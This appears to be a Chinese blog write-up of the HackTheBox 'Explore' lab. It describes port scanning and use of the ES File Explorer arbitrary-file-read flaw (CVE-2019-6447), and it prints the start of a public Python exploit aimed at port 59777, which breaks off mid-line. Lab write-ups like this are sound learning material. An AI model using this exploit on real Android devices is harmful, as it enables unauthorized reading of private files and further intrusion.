hackthebox --explore

本文讲述了通过信息收集发现目标设备开放的多个端口,利用42135端口上的ESFileExplorer漏洞进行任意文件读取。通过编写并运行exploit,获取了账号密码,并利用SSH在2222端口登录。接着通过adb工具进行端口转发和shell操作,最终实现权限提升,成功获取设备控制权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


一、信息收集

在这里插入图片描述
扫描发现只开放了2222跟5555端口,深入扫描一下
在这里插入图片描述
在这里插入图片描述
发现还开放了34687,42135跟59777端口,然后去寻找各个端口服务的漏洞
最后发现在42135端口存在“ ES File Explorer Name Response httpd”可利用漏洞,这个漏洞是任意文件读取漏洞,接下来就是通过这个漏洞去查找敏感文件,看看是否存在敏感信息,帮助我们getshell。

二、Getshell

代码如下(示例):
最终在网上找到了一个有关“ ES File Explorer Name Response httpd”的exploit

# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447

import requests
import json
import ast
import sys

if len(sys.argv) < 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
    sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = 
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值